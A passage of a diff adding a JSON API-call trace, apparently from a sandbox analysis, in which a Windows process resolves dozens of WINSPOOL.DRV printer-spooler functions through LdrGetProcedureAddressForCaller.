"value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "IsValidDevmodeA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f161a0" + } + ], + "repeated": 0, + "id": 59 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07749", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPortExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1e0d0" + } + ], + "repeated": 0, + "id": 60 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0775a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrintProvidorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1fc10" + } + ], + "repeated": 0, + "id": 61 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0776b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPrintProvidorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1e2f0" + } + ], + "repeated": 0, + "id": 62 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0777c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrintProcessorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1fb20" + } + ], + "repeated": 0, + "id": 63 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0778d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeleteMonitorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1f950" + } + ], + "repeated": 0, + "id": 64 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0779e", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddMonitorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1df00" + } + ], + "repeated": 0, + "id": 65 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f077af", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "StartDocDlgW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efcf00" + } + ], + "repeated": 0, + "id": 66 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f077c0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AdvancedDocumentPropertiesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1efa0" + } + ], + "repeated": 0, + "id": 67 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f077d1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AdvancedDocumentPropertiesA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f13e00" + } + ], + "repeated": 0, + "id": 68 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f077e2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DocumentPropertiesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efffc0" + } + ], + "repeated": 0, + "id": 69 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f077f3", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeviceCapabilitiesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73effd90" + } + ], + "repeated": 0, + "id": 70 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07804", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterIC" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efe900" + } + ], + "repeated": 0, + "id": 71 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07815", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "PlayGdiScriptOnPrinterIC" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efe990" + } + ], + "repeated": 0, + "id": 72 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07826", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "CreatePrinterIC" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efea20" + } + ], + "repeated": 0, + "id": 73 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07837", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetJobW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23170" + } + ], + "repeated": 0, + "id": 74 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07848", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetJobW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f21530" + } + ], + "repeated": 0, + "id": 75 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07859", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumJobsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efe590" + } + ], + "repeated": 0, + "id": 76 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0786a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1ec00" + } + ], + "repeated": 0, + "id": 77 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0787b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23690" + } + ], + "repeated": 0, + "id": 78 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0788c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDriverW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f01210" + } + ], + "repeated": 0, + "id": 79 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0789d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDriverDirectoryW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f05c40" + } + ], + "repeated": 0, + "id": 80 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f078ae", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPrintersW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73eff610" + } + ], + "repeated": 0, + "id": 81 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f078bf", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPrinterConnectionW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2e730" + } + ], + "repeated": 0, + "id": 82 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f078d0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterConnectionW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2e7b0" + } + ], + "repeated": 0, + "id": 83 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f078e1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPrinterDriverExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1e420" + } + ], + "repeated": 0, + "id": 84 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f078f2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPrinterDriverExA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f13c30" + } + ], + "repeated": 0, + "id": 85 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07903", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterDriversW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20e80" + } + ], + "repeated": 0, + "id": 86 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07914", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDriverW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20140" + } + ], + "repeated": 0, + "id": 87 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07925", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDriverExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20050" + } + ], + "repeated": 0, + "id": 88 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07936", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPrintProcessorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1e1f0" + } + ], + "repeated": 0, + "id": 89 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07947", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPrintProcessorsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20a60" + } + ], + "repeated": 0, + "id": 90 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07958", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrintProcessorDirectoryW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f22440" + } + ], + "repeated": 0, + "id": 91 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07969", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPrintProcessorDatatypesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20940" + } + ], + "repeated": 0, + "id": 92 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0797a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "207" + }, + { + "name": "FunctionAddress", + "value": "0x73f1e010" + } + ], + "repeated": 0, + "id": 93 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0798b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "209" + }, + { + "name": "FunctionAddress", + "value": "0x73f1fa40" + } + ], + "repeated": 0, + "id": 94 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0799c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "211" + }, + { + "name": "FunctionAddress", + "value": "0x73f206f0" + } + ], + "repeated": 0, + "id": 95 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f079ad", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "212" + }, + { + "name": "FunctionAddress", + "value": "0x73f00720" + } + ], + "repeated": 0, + "id": 96 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f079be", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SplDriverUnloadComplete" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23bb0" + } + ], + "repeated": 0, + "id": 97 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f079cf", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "213" + }, + { + "name": "FunctionAddress", + "value": "0x73f007d0" + } + ], + "repeated": 0, + "id": 98 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f079e0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "214" + }, + { + "name": "FunctionAddress", + "value": "0x73f00680" + } + ], + "repeated": 0, + "id": 99 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f079f1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "OpenPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f06770" + } + ], + "repeated": 0, + "id": 100 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a02", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "OpenPrinterA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f161e0" + } + ], + "repeated": 0, + "id": 101 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a13", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "ResetPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f02170" + } + ], + "repeated": 0, + "id": 102 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a24", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "StartDocPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efd0a0" + } + ], + "repeated": 0, + "id": 103 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a35", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "FlushPrinter" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f211c0" + } + ], + "repeated": 0, + "id": 104 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a46", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f06230" + } + ], + "repeated": 0, + "id": 105 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a57", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetPrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23580" + } + ], + "repeated": 0, + "id": 106 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a68", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddJobW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1dbc0" + } + ], + "repeated": 0, + "id": 107 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a79", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "ScheduleJob" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f22be0" + } + ], + "repeated": 0, + "id": 108 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a8a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "WaitForPrinterChange" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f26dd0" + } + ], + "repeated": 0, + "id": 109 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07a9b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "FindNextPrinterChangeNotification" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73effc80" + } + ], + "repeated": 0, + "id": 110 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + 